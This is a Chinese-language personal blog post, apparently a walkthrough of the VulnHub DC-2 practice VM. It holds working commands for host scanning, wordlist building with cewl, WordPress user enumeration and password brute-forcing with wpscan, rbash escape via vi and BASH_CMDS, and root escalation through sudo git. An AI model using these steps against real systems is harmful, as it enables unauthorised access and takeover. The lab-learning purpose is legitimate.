<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="author" content="John Doe">
    
    
    
    
    
    
    <title>DC-2Try | Hexo</title>
    <!-- inject:style -->
    <link href="/css/style.css" rel="stylesheet" type="text/css">
    <!-- endinject -->
    <style>
        .cube-loading {
            top: 0;
            position: fixed;
            width: 100%;
            height: 100%;
            background: url('/images/lg/loading.gif') no-repeat center center;
            background-color: rgba(0,0,0,.7);
        }

        .cube-loading.out {
            display: none;
        }

        .cube-loading:before {
            display: block;
            content: 'Loading';
            position: relative;
            width: 100%;
            top: 50%;
            right: -50%;
            color: #fff;
        }

        @media(max-width: 768px) {
            .cube-loading:before {
                font-size: 1.2em;
                transform: translate(-24px,20px);
                -webkit-transform: translate(-24px,20px);
                -o-transform: translate(-24px,20px);
                -ms-transform: translate(-24px,20px);
            }
        }

        @media(min-width: 768px) {
            .cube-loading:before {

            }
        }
    </style>
    
<meta name="generator" content="Hexo 6.3.0"></head>
<body>
<div class="cube-body">
    <nav id="cube-top-memu" class="cube-menu">
    <ul class="cube-menu-collapse">
        
        <li>
            <i class="cube-icon cube-icon-home" aria-hidden="true"></i>
            <a href="/">首页</a>
        </li>
        
        <li>
            <i class="cube-icon cube-icon-archive" aria-hidden="true"></i>
            <a href="/archives">归档</a>
        </li>
        
        <li>
            <i class="cube-icon cube-icon-categories" aria-hidden="true"></i>
            <a href="/categories">分类</a>
        </li>
        
        <li>
            <i class="cube-icon cube-icon-tags" aria-hidden="true"></i>
            <a href="/tags">标签</a>
        </li>
        
        <li>
            <i class="cube-icon cube-icon-about" aria-hidden="true"></i>
            <a href="/about-me">关于我</a>
        </li>
        
    </ul>
</nav>
<nav class="cube-side-menu" id="cube-side-menu">
    <ul class="cube-menu-list">
        
        <li>
            <a class="lrc-control">Open Lyrics</a>
        </li>
        
        <li>
            <a class="scroll-to-top">Top</a>
        </li>
    </ul>
</nav>
    <header class="cube-header" id="cube-header">
    <img src=" https://api.r10086.com/%E5%9B%BE%E5%8C%85webp/%E6%B5%B7%E8%B4%BC%E7%8E%8B%E6%A8%AA%E5%B1%8F%E7%B3%BB%E5%88%971/wallhaven-0q6vml.webp " alt="头部背景图片">
    
    <div class="cube-type">
        <span class="cube-typed-title">zyzhuv的私人博客</span>
        <span class="cube-typed-cursor">|</span>
    </div>
    
</header>

    <style>
        nav.cube-menu:before {
            content: '';
            visibility: hidden;
            position: absolute;
            left: 0;
            top: 0;
            width: 100%;
            height: 44px;
        
            filter: blur(1px);
            -webkit-filter: blur(1px);
        
            z-index: -1;
            background-image: url('https://api.r10086.com/%E5%9B%BE%E5%8C%85webp/%E6%B5%B7%E8%B4%BC%E7%8E%8B%E6%A8%AA%E5%B1%8F%E7%B3%BB%E5%88%971/wallhaven-0q6vml.webp');
            background-repeat: no-repeat;
            background-position: center -256px;
            background-size: cover;
            background-color: transparent;
        }

        header.cube-background.cube-header-background {
            visibility: hidden;
            background-image: url('https://api.r10086.com/%E5%9B%BE%E5%8C%85webp/%E6%B5%B7%E8%B4%BC%E7%8E%8B%E6%A8%AA%E5%B1%8F%E7%B3%BB%E5%88%971/wallhaven-0q6vml.webp');
            background-position: center -300px;
        }
    </style>
    <header class="cube-background cube-header-background">
        
        <div class="cube-type">
            <span class="cube-typed-title">zyzhuv的私人博客</span>
            <span class="cube-typed-cursor">|</span>
        </div>
        
    </header>
    <div class="load-header-background"></div>
    <script>
        (function (window) {

            window.headerModule = {}
            window.headerModule.image = {
                width: '2000',
                height: '1314'
            }

        })(window)
    </script>
    
    <div class="cube-content">
        <div class="cube-left">
            <div class="cube-article">
    <h1 class="title">DC-2Try</h1>
        
            <div class="cube-article-header">
                <div class="cube-article-date">
                    <i class="cube-icon cube-icon-date" aria-hidden="true"></i>
                    <!-- moment.js对象 -->
                    2024-07-26
                </div>
                <div class="cube-article-tags">
    <i class="cube-icon cube-icon-tag" aria-hidden="true"></i>
    
</div>
            </div>
            
                    <div class="cube-article-content cube-markdown">
                        
                            <p>1 dc2下载</p>
<p><a target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/dc-2,311/">https://www.vulnhub.com/entry/dc-2,311/</a></p>
<p>先设成net模式</p>
<p>2</p>
<span id="more"></span>

<p>信息收集</p>
<p>(1)看ip</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">arp-scan -l</span><br><span class="line">nmap -sP 192.168.49.0/24</span><br></pre></td></tr></table></figure>

<p>看到 131</p>
<p>（2）看端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -A -p1-65535 192.168.49.131</span><br></pre></td></tr></table></figure>

<p>看到 80 http        7744  ssh</p>
<p>(3) 访问http</p>
<p>找不到，而且域名变成dc-2  被重定向了</p>
<p>可以本地dns绑定</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">c:\Windows\System32\drivers\etc</span><br><span class="line">看到hosts文件</span><br><span class="line">打开   （可能是只读，属性改一下就行）</span><br><span class="line">我这个用记事本保存不了用的no++</span><br></pre></td></tr></table></figure>

<p><img src="/2024/07/26/DC-2Try/2.png" alt="DC-Try"></p>
<p>这个加一下保存即可</p>
<p>再访问就行了</p>
<p>看到flag</p>
<p>Flag<br>Edit “Flag”	</p>
<p>Flag 1:</p>
<p>Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.</p>
<p>More passwords is always better, but sometimes you just can’t win them all.</p>
<p>Log in as one to see the next flag.</p>
<p>If you can’t find it, log in as another.</p>
<p>这个大概就是登录给flag，提到了cewl</p>
<p>cewl是一款采用Ruby开发的应用程序，你可以给它的爬虫指定url地址和爬取深度，还可以添加额外的外部链接，接下来cewl会给你返回一个字典文件你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外，Cewl还提供了命令行工具</p>
<p>（3）找密码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">cewl http://dc-2 -w passwd.txt</span><br><span class="line"></span><br><span class="line">注意用这个passwd。txt为空 cewl http://192.168.49.131 -w passwd.txt  因为被重定向</span><br></pre></td></tr></table></figure>

<p>（4）找目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dirb http://dc-2</span><br></pre></td></tr></table></figure>

<p><img src="/2024/07/26/DC-2Try/3.png" alt="DC-Try"></p>
<p>看到admin.php</p>
<p>访问一下</p>
<p><img src="/2024/07/26/DC-2Try/4.png" alt="DC-Try"></p>
<p>看到wordpress  现在有密码没账号</p>
<p>wordpress这个有一个著名的扫描工具wpscan</p>
<p>（5）枚举用户名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url http://dc-2/ -e u</span><br></pre></td></tr></table></figure>

<p><img src="/2024/07/26/DC-2Try/5.png" alt="DC-Try"></p>
<p>把用户名写到txt文本</p>
<p><img src="/2024/07/26/DC-2Try/6.png" alt="DC-Try"></p>
<p>（6）wpscan爆破账号密码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url http://dc-2/ -U user.txt -P passwd.txt</span><br></pre></td></tr></table></figure>



<p><img src="/2024/07/26/DC-2Try/7.png" alt="DC-Try"></p>
<p>[SUCCESS] - jerry &#x2F; adipiscing<br>[SUCCESS] - tom &#x2F; parturient</p>
<p>爆出来两个 登录	</p>
<p>登陆成功但不跳转</p>
<p>再访问url就登上</p>
<p><a target="_blank" rel="noopener" href="http://dc-2/wp-admin/">http://dc-2/wp-admin/</a> </p>
<p><img src="/2024/07/26/DC-2Try/8.png" alt="DC-Try"></p>
<p>看到这个7 pages</p>
<p>得到第二个flag</p>
<p>If you can’t exploit WordPress and take a shortcut, there is another way.</p>
<p>Hope you found another entry point.</p>
<p>你不能去爆wordpress,让你再找一个</p>
<p>3 操作</p>
<p>看到一个ssh 7744没用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh jerry@192.168.49.131 -p 7744</span><br></pre></td></tr></table></figure>

<p>输入密码，不行</p>
<p>换一个账号</p>
<p>ssh <a href="mailto:&#x74;&#x6f;&#x6d;&#64;&#49;&#x39;&#50;&#x2e;&#49;&#54;&#56;&#46;&#52;&#57;&#x2e;&#49;&#51;&#49;">&#x74;&#x6f;&#x6d;&#64;&#49;&#x39;&#50;&#x2e;&#49;&#54;&#56;&#46;&#52;&#57;&#x2e;&#49;&#51;&#49;</a> -p 7744</p>
<p>输入密码</p>
<p>ok登进去了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">ls  #看到flag3.txt</span><br><span class="line">cat flag3.txt</span><br><span class="line">发现 rbash 禁了cat</span><br><span class="line"></span><br><span class="line">compgen -c   查看可以使用的命令</span><br><span class="line">有一个vi</span><br><span class="line">vi flag3.txt</span><br></pre></td></tr></table></figure>

<p>Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.</p>
<p>这个提到Tom，Jerry，su ，应该要去提权</p>
<p>刚好有一个vi提权</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">vi flag3.txt</span><br><span class="line">先 esc 再 ：</span><br><span class="line">:set shell=/bin/sh</span><br><span class="line">回车</span><br><span class="line">再：</span><br><span class="line">：shell</span><br><span class="line">直接提权</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">先ls看一下</span><br><span class="line">cd ..</span><br><span class="line">ls   # 发现jerry</span><br><span class="line">cd jerry</span><br><span class="line">ls #看到flag4.txt</span><br><span class="line">vi flag4.txt</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>大致是最后一个flag在root   提示了git命令，  home意思就是&#x2F;root</p>
<p>cd &#x2F;root</p>
<p>被拒绝</p>
<p>su一下到jerry不行</p>
<p>4  终极之战</p>
<p>rbash环境变量提权</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">export -p   查看环境变量</span><br><span class="line">exit退出vi提权</span><br><span class="line">BASH_CMDS[a]=/bin/sh;a</span><br><span class="line">/bin/bash</span><br><span class="line">export PATH=$PATH:/bin/</span><br><span class="line">export PATH=$PATH:/usr/bin</span><br><span class="line"></span><br><span class="line">su jerry</span><br><span class="line">输入密码切换成功</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="/2024/07/26/DC-2Try/9.png" alt="DC-Try"></p>
<p>权限还是不够</p>
<p>老一套</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -perm -u=s -type f 2&gt;/dev/null</span><br></pre></td></tr></table></figure>

<p>看到sudo有s提权</p>
<p>看一下有啥sudo权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo -l</span><br></pre></td></tr></table></figure>

<p>看到git是root权限</p>
<p>git提权</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">1 sudo git help config</span><br><span class="line">G到最后 i转到insert</span><br><span class="line">输入 !/bin/bash   或者!&#x27;sh&#x27;  提权</span><br><span class="line">2 sudo git -p help</span><br><span class="line">!/bin/bash    </span><br><span class="line">到root下</span><br><span class="line">cd /root</span><br><span class="line">ls</span><br><span class="line">cat /final-flag.txt</span><br><span class="line">出了</span><br></pre></td></tr></table></figure>


                    </div>
</div>

    <div class="cube-article-nav">
        <ul>
            
                <li class="prev">
                    <a href="/2024/07/26/DC3-2Try/">
                        <i class="cube-icon cube-prev" aria-hidden="true"></i>
                        DC3-2Try
                    </a>
                </li>
                
                    
                        <li class="next">
                            <a href="/2024/07/25/DC1Try/">
                                DC1Try
                                    <i class="cube-icon cube-next" aria-hidden="true"></i>
                            </a>
                        </li>
                        
        </ul>
    </div>
    
        
            <!-- TODO 根据theme.comment的内容进行入口选择 -->

                
        </div>
        <div class="cube-right">
            

<div class="cube-search cube-sidebar" id="cube-search">
    <div class="search-container">
        <input type="text" placeholder="Search" class="cube-search-input" id="cube-search-input">
        <i class="cube-icon cube-icon-search cube-search-submit" aria-hidden="true"></i>
    </div>
    <!-- TODO 通过给window赋一个全局变量，通过脚本赋值 -->
</div>
<script>
    (function (window) {
        'use strict';
        window.searchModule = {}
        window.searchModule.JSONUrl = '/content.json'
        window.searchModule.rootUrl = '/'
    })(window)
</script>
<div class="cube-search-form">
    <div class="cube-search-control">
        <input type="text" placeholder="Search" class="search-input">
        <a class="close-button">
            <i class="cube-icon cube-close" aria-hidden="true"></i>
        </a>
    </div>
    <div class="cube-search-result"></div>
</div>


<div class="cube-author cube-sidebar" id="cube-author">
    
    
    <span>John Doe</span>
    
    
    <div class="count">
        <a class="count articles"><span>11</span>Article</a>
        <a class="count tags"><span>0</span>Tags</a>
        <a class="count categories"><span>0</span>Categories</a>
    </div>
</div>



<div class="cube-music cube-sidebar" id="cube-music">
    <div class="cube-player aplayer" id="cube-player"></div>
</div>
<script>
    (function (window) {
        window.musicModule = {}
        window.musicModule.musicConfig = '{"narrow":false,"autoplay":false,"showlrc":3,"theme":"#b7daff","mutex":true,"mode":"circulation","preload":"auto","listmaxheight":"513px","music":[{"title":"Dear friends","author":"TRIPLANE","url":"http://cube-1252774894.cosgz.myqcloud.com/music/source/TRIPLANE - Dear friends.mp3","lrc":"http://cube-1252774894.cosgz.myqcloud.com/music/lrc/Dear friends - TRIPLANE.lrc","pic":"http://cube-1252774894.cosgz.myqcloud.com/music/image/TRIPLANE - Dear friends.jpg"},{"title":"Butter-Fly","author":"和田光司","url":"http://cube-1252774894.cosgz.myqcloud.com/music/source/和田光司 - Butter-Fly (ピアノヴァージョン).mp3","lrc":"http://cube-1252774894.cosgz.myqcloud.com/music/lrc/Butter-Fly (ピアノヴァージョン) - 和田光司.lrc","pic":"http://cube-1252774894.cosgz.myqcloud.com/music/image/和田光司 - Butter-Fly (ピアノヴァージョン).jpg"},{"title":"宵闇花火","author":"葉月ゆら","url":"http://cube-1252774894.cosgz.myqcloud.com/music/source/葉月ゆら - 宵闇花火.mp3","lrc":"http://cube-1252774894.cosgz.myqcloud.com/music/lrc/宵闇花火 - 葉月ゆら.lrc","pic":"http://cube-1252774894.cosgz.myqcloud.com/music/image/葉月ゆら - 宵闇花火.jpg"}]}'
        window.musicModule.lrcConfig = {
            open: 'Open Lyrics',
            close: 'Close Lyrics'
        }
    })(window)
</script>



<div class="cube-recent-posts cube-sidebar" id="cube-recent-posts">
    <div class="title">
        <a>Recent Posts</a>
    </div>
    <ul class="list">
        
        
        <li>
            <!-- TODO 如果文章要显示图片，那么在front-matter上添加preview属性(url or path) -->
            
            <div class="normal">
                <p class="index first">
                    <span>1</span>
                </p>
                <p class="title">
                    <a href="/2024/07/27/DC4-Try/" title="DC4-Try">DC4-Try</a>
                </p>
            </div>
            
        </li>
        
        
        
        <li>
            <div class="normal">
                <p class="index">
                    <span>2</span>
                </p>
                <p class="title">
                    <a href="/2024/07/26/DC3-2Try/" title="DC3-2Try">DC3-2Try</a>
                </p>
            </div>
        </li>
        
        
        
        <li>
            <div class="normal">
                <p class="index">
                    <span>3</span>
                </p>
                <p class="title">
                    <a href="/2024/07/26/DC-2Try/" title="DC-2Try">DC-2Try</a>
                </p>
            </div>
        </li>
        
        
        
        <li>
            <div class="normal">
                <p class="index">
                    <span>4</span>
                </p>
                <p class="title">
                    <a href="/2024/07/25/DC1Try/" title="DC1Try">DC1Try</a>
                </p>
            </div>
        </li>
        
        
        
        <li>
            <div class="normal">
                <p class="index">
                    <span>5</span>
                </p>
                <p class="title">
                    <a href="/2024/07/08/ciscn-sanic-py%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/" title="ciscn sanic py原型链污染">ciscn sanic py原型链污染</a>
                </p>
            </div>
        </li>
        
        
    </ul>
</div>







<div class="cube-links cube-sidebar" id="cube-links">
    <div class="title">
        <a>Links</a>
    </div>
    <ul class="list">
        
        <li>
            
            
            <img src="http://cube-1252774894.cosgz.myqcloud.com/links/GitHub.png">
            
            <a href="https://github.com/ZEROKISEKI" target="_blank">GitHub</a>
        </li>
        
        <li>
            
            
            <img src="http://cube-1252774894.cosgz.myqcloud.com/links/Coding.png">
            
            <a href="https://coding.net/u/SORA1" target="_blank">Coding</a>
        </li>
        
        <li>
            
            
            <img src="http://cube-1252774894.cosgz.myqcloud.com/links/SF.png">
            
            <a href="https://segmentfault.com/u/aonosora" target="_blank">SF社区</a>
        </li>
        
        <li>
            
            
            <img src="http://cube-1252774894.cosgz.myqcloud.com/links/开发者头条.png">
            
            <a href="https://toutiao.io/u/148070" target="_blank">开发者头条</a>
        </li>
        
    </ul>
</div>



<div class="cube-friend-links cube-sidebar" id="cube-friend-links">
    <div class="title">
        <a>Friend Links</a>
    </div>
    <ul class="list">
        
        <li>
            <!-- TODO change avatar.png to friend.png-->
            <img src="http://cube-1252774894.cosgz.myqcloud.com/friend_links/micblo.png">
            <a href="https://blog.micblo.com/" target="_blank">罗大佬</a>
        </li>
        
        <li>
            <!-- TODO change avatar.png to friend.png-->
            <img src="http://cube-1252774894.cosgz.myqcloud.com/friend_links/DIYgod.jpg">
            <a href="https://www.anotherhome.net/" target="_blank">DIYgod</a>
        </li>
        
        <li>
            <!-- TODO change avatar.png to friend.png-->
            <img src="/images/friend_links.jpg ">
            <a href="https://aonosora.com/" target="_blank">咪西西の部落格</a>
        </li>
        
    </ul>
</div>


        </div>
    </div>
</div>
<footer class="cube-footer">
    
© 2017 John Doe

<br>
Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>.&nbsp;Theme by <a href="https://github.com/ZEROKISEKI" target="_blank">AONOSORA</a>
</footer>
<!-- inject:script -->
<script src="/js/script.js"></script>
<!-- endinject -->
<div class="cube-loading out"></div>
</body>
</html>